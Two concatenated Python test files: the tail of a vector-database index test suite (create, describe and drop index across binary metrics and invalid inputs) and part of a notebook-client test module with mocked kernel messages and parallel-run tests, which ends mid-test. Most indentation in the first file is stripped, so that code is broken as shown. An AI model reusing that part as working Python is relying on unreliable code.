method: create collection and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, jac_collection):
'''
target: test create index without connection
        method: create index without an active connection
expected: raise exception
'''
nlist = NLIST
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(jac_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(jac_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
        status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == jac_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status = connect.create_partition(jac_collection, tag)
        status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
class TestIndexBinary:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, self.vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, res = connect.count_collection(ham_collection)
assert res == len(self.vectors)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_structure(self, connect, substructure_collection, get_substructure_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
logging.getLogger().info(get_substructure_index)
status = connect.create_partition(substructure_collection, tag)
status, ids = connect.add_vectors(substructure_collection, self.vectors, partition_tag=tag)
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
        status, res = connect.count_collection(substructure_collection)
assert res == len(self.vectors)
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, ham_collection):
'''
target: test create index without connection
        method: create index without an active connection
expected: raise exception
'''
nlist = NLIST
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(ham_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ham_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ham_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_superstructure(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
        expected: return code equals 0, and search succeeds
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status, ids = connect.add_vectors(superstructure_collection, self.vectors)
status = connect.create_index(superstructure_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(superstructure_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(superstructure_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
        status, ids = connect.add_vectors(ham_collection, self.vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ham_collection
assert result._index_type == index_type
def test_describe_index_partition_superstructrue(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status = connect.create_partition(superstructure_collection, tag)
        status, ids = connect.add_vectors(superstructure_collection, self.vectors, partition_tag=tag)
status = connect.create_index(superstructure_collection, index_type, index_param)
status, result = connect.describe_index(superstructure_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == superstructure_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_substructure(self, connect, substructure_collection, get_substructure_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
status = connect.drop_index(substructure_collection)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
assert result._collection_name == substructure_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status = connect.create_partition(ham_collection, tag)
        status, ids = connect.add_vectors(ham_collection, self.vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
class TestIndexCollectionInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
nlist = NLIST
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, IndexType.IVF_SQ8, index_param)
assert not status.OK()
@pytest.mark.level(1)
def test_describe_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status, result = connect.describe_index(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_drop_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status = connect.drop_index(collection_name)
assert not status.OK()
class TestCreateIndexParamsInvalid(object):
"""
Test Building index with invalid collection names, collection names not in db
"""
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
if (not index_type) or (not isinstance(index_type, IndexType)):
with pytest.raises(Exception) as e:
status = connect.create_index(collection, index_type, index_param)
else:
status = connect.create_index(collection, index_type, index_param)
assert not status.OK()
"""
Test Building index with invalid nlist
"""
@pytest.fixture(
scope="function",
params=[IndexType.FLAT,IndexType.IVFLAT,IndexType.IVF_SQ8,IndexType.IVF_SQ8H]
)
def get_index_type(self, request):
yield request.param
def test_create_index_with_invalid_nlist(self, connect, collection, get_index_type):
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, get_index_type, {"nlist": INVALID_NLIST})
if get_index_type != IndexType.FLAT:
assert not status.OK()
'''
Test Building index with empty params
'''
def test_create_index_with_empty_param(self, connect, collection, get_index_type):
logging.getLogger().info(get_index_type)
status = connect.create_index(collection, get_index_type, {})
        if get_index_type != IndexType.FLAT:
assert not status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
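# Illustrative sketch only, not a collected test (the name has no ``test_`` prefix):
# the create / describe / drop lifecycle exercised by the cases above, assuming a live
# ``connect`` handle and an existing float-vector collection.
def _example_index_lifecycle(connect, collection):
    index_param = {"nlist": NLIST}
    status = connect.create_index(collection, IndexType.IVF_SQ8, index_param)
    assert status.OK()
    status, result = connect.describe_index(collection)
    assert result._index_type == IndexType.IVF_SQ8
    assert result._params == index_param
    status = connect.drop_index(collection)
    assert status.OK()
    # after dropping, describe_index reports the default FLAT index again
    status, result = connect.describe_index(collection)
    assert result._index_type == IndexType.FLAT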
|
test_client.py
|
import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock
import nbformat
import pytest
import xmltodict # type: ignore
from ipython_genutils.py3compat import string_types
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi # type: ignore
from nbformat import NotebookNode
from testpath import modified_env # type: ignore
from traitlets import TraitError
from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase
addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
current_dir = os.path.dirname(__file__)
ipython_input_pat = re.compile(
r'(<ipython-input-\d+-[0-9a-f]+>|<IPY-INPUT>) in (<module>|<cell line: \d>\(\))'
)
# Tracebacks look different in IPython 8,
# see: https://github.com/ipython/ipython/blob/master/docs/source/whatsnew/version8.rst#traceback-improvements # noqa
ipython8_input_pat = re.compile(
r'(Input In \[\d+\]|<IPY-INPUT>), in (<module>|<cell line: \d>\(\))'
)
hook_methods = [
"on_cell_start",
"on_cell_execute",
"on_cell_complete",
"on_cell_error",
"on_notebook_start",
"on_notebook_complete",
"on_notebook_error",
]
class AsyncMock(Mock):
pass
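# ``AsyncMock`` plus ``make_async`` let the plain ``Mock`` machinery stand in for the
# awaited kernel-client calls below: the mock hands back a one-shot coroutine that
# resolves to a fixed value.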
def make_async(mock_value):
async def _():
return mock_value
return _()
def normalize_base64(b64_text):
    # if it's base64, pass it through b64 decode/encode so that
    # equivalent values are not considered unequal
try:
return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii')
except (ValueError, TypeError):
return b64_text
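# Minimal sketch of the normalization above (the helper name is illustrative and not
# used by the tests): equivalent base64 payloads compare equal, non-base64 text passes
# through unchanged.
def _example_normalize_base64():
    assert normalize_base64('aGVsbG8=\n') == normalize_base64('aGVsbG8=') == 'aGVsbG8='
    # strings that cannot be decoded are returned as-is
    assert normalize_base64('hello') == 'hello'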
def run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = executor.execute()
return input_nb, output_nb
def run_notebook_wrapper(args):
# since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
# we need to unpack the arguments
return run_notebook(*args)
async def async_run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = await executor.async_execute()
return input_nb, output_nb
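# Minimal sketch (not a test) of driving the async helper directly; it assumes the
# HelloWorld notebook shipped with these tests and a local "python" kernel. Helpers
# defined further down in this module are only looked up when the sketch is called.
def _example_async_run_notebook_roundtrip():
    input_file = os.path.join(current_dir, "files", "HelloWorld.ipynb")
    input_nb, output_nb = asyncio.run(
        async_run_notebook(input_file, dict(kernel_name="python"), notebook_resources())
    )
    assert_notebooks_equal(input_nb, output_nb)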
def prepare_cell_mocks(*messages, reply_msg=None):
"""
    This function prepares an executor object which has a fake kernel client
    to mock the messages sent over zeromq. The mock kernel client will return
    the messages passed into this wrapper back from ``executor.kc.iopub_channel.get_msg``
    callbacks. It also appends a kernel idle message to the end of messages.
"""
parent_id = 'fake_id'
messages = list(messages)
# Always terminate messages with an idle to exit the loop
messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})
def shell_channel_message_mock():
# Return the message generator for
# self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
return AsyncMock(
return_value=make_async(
NBClientTestsBase.merge_dicts(
{
'parent_header': {'msg_id': parent_id},
'content': {'status': 'ok', 'execution_count': 1},
},
reply_msg or {},
)
)
)
def iopub_messages_mock():
# Return the message generator for
# self.kc.iopub_channel.get_msg => messages[i]
return AsyncMock(
side_effect=[
# Default the parent_header so mocks don't need to include this
make_async(
NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
)
for msg in messages
]
)
def prepared_wrapper(func):
@functools.wraps(func)
def test_mock_wrapper(self):
"""
This inner function wrapper populates the executor object with
the fake kernel client. This client has its iopub and shell
channels mocked so as to fake the setup handshake and return
the messages passed into prepare_cell_mocks as the execute_cell loop
processes them.
"""
cell_mock = NotebookNode(
source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
)
executor = NotebookClient({})
executor.nb = {'cells': [cell_mock]}
# self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
message_mock = iopub_messages_mock()
executor.kc = MagicMock(
iopub_channel=MagicMock(get_msg=message_mock),
shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
execute=MagicMock(return_value=parent_id),
is_alive=MagicMock(return_value=make_async(True)),
)
executor.parent_id = parent_id
return func(self, executor, cell_mock, message_mock)
return test_mock_wrapper
return prepared_wrapper
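# Minimal sketch of how ``prepare_cell_mocks`` is used (the underscore prefix keeps
# pytest from collecting it): declare the iopub messages the fake kernel should emit,
# then assert on what ``execute_cell`` records on the mocked cell.
@prepare_cell_mocks(
    {
        'msg_type': 'stream',
        'header': {'msg_type': 'stream'},
        'content': {'name': 'stdout', 'text': 'hello'},
    }
)
def _example_prepared_cell(self, executor, cell_mock, message_mock):
    executor.execute_cell(cell_mock, 0)
    # one stream message plus the terminating idle message
    assert message_mock.call_count == 2
    assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'hello'}]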
def normalize_output(output):
"""
Normalizes outputs for comparison.
"""
output = dict(output)
if 'metadata' in output:
del output['metadata']
if 'text' in output:
output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text'])
if 'text/plain' in output.get('data', {}):
output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain'])
if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}):
output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
if 'image/svg+xml' in output.get('data', {}):
output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml'])
for key, value in output.get('data', {}).items():
if isinstance(value, string_types):
output['data'][key] = normalize_base64(value)
if 'traceback' in output:
tb = []
for line in output["traceback"]:
line = re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line))
line = re.sub(ipython8_input_pat, '<IPY-INPUT>', strip_ansi(line))
tb.append(line)
output['traceback'] = tb
return output
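# Quick sketch of what the normalization does: memory addresses are masked and the
# volatile ``metadata`` field is dropped, so outputs compare stably across runs.
def _example_normalize_output():
    raw = {'output_type': 'stream', 'name': 'stdout',
           'text': '<Thing at 0x7f3d2c1a8>', 'metadata': {}}
    assert normalize_output(raw) == {
        'output_type': 'stream', 'name': 'stdout', 'text': '<Thing at <HEXADDR>>'
    }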
def assert_notebooks_equal(expected, actual):
expected_cells = expected['cells']
actual_cells = actual['cells']
assert len(expected_cells) == len(actual_cells)
for expected_cell, actual_cell in zip(expected_cells, actual_cells):
# Uncomment these to help debug test failures better
# from pprint import pprint
# pprint(expected_cell)
# pprint(actual_cell)
expected_outputs = expected_cell.get('outputs', [])
actual_outputs = actual_cell.get('outputs', [])
normalized_expected_outputs = list(map(normalize_output, expected_outputs))
normalized_actual_outputs = list(map(normalize_output, actual_outputs))
assert normalized_expected_outputs == normalized_actual_outputs
expected_execution_count = expected_cell.get('execution_count', None)
actual_execution_count = actual_cell.get('execution_count', None)
assert expected_execution_count == actual_execution_count
def notebook_resources():
"""
Prepare a notebook resources dictionary for executing test
notebooks in the ``files`` folder.
"""
return {'metadata': {'path': os.path.join(current_dir, 'files')}}
def filter_messages_on_error_output(err_output):
allowed_lines = [
        # ipykernel might be installed without the debugpy extension
"[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
]
filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines]
return os.linesep.join(filtered_result)
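# Minimal sketch: the known-benign ipykernel warning is dropped, while anything else
# captured on stderr is kept verbatim.
def _example_filter_messages_on_error_output():
    err = "\n".join([
        "[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
        "Traceback (most recent call last):",
    ])
    assert filter_messages_on_error_output(err) == "Traceback (most recent call last):"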
@pytest.mark.parametrize(
["input_name", "opts"],
[
("Other Comms.ipynb", dict(kernel_name="python")),
("Clear Output.ipynb", dict(kernel_name="python")),
("Empty Cell.ipynb", dict(kernel_name="python")),
("Factorials.ipynb", dict(kernel_name="python")),
("HelloWorld.ipynb", dict(kernel_name="python")),
("Inline Image.ipynb", dict(kernel_name="python")),
(
"Interrupt.ipynb",
dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
),
("JupyterWidgets.ipynb", dict(kernel_name="python")),
("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
("SVG.ipynb", dict(kernel_name="python")),
("Unicode.ipynb", dict(kernel_name="python")),
("UnicodePy3.ipynb", dict(kernel_name="python")),
("update-display-id.ipynb", dict(kernel_name="python")),
("Check History in Memory.ipynb", dict(kernel_name="python")),
],
)
def test_run_all_notebooks(input_name, opts):
"""Runs a series of test notebooks and compares them to their actual output"""
input_file = os.path.join(current_dir, 'files', input_name)
input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
assert_notebooks_equal(input_nb, output_nb)
def test_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
threads = [
threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
for label in ("A", "B")
]
[t.start() for t in threads]
[t.join(timeout=2) for t in threads]
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_async_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
tasks = [
async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B")
]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_async_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_execution_timing():
"""Compare the execution timing information stored in the cell with the
actual time it took to run the cell. Also check for the cell timing string
format."""
opts = dict(kernel_name="python")
input_name = "Sleep1s.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
input_nb, output_nb = run_notebook(input_file, opts, res)
def get_time_from_str(s):
time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
return datetime.datetime.strptime(s, time_format)
execution_timing = output_nb['cells'][1]['metadata']['execution']
status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
status_idle = get_time_from_str(execution_timing['iopub.status.idle'])
cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])
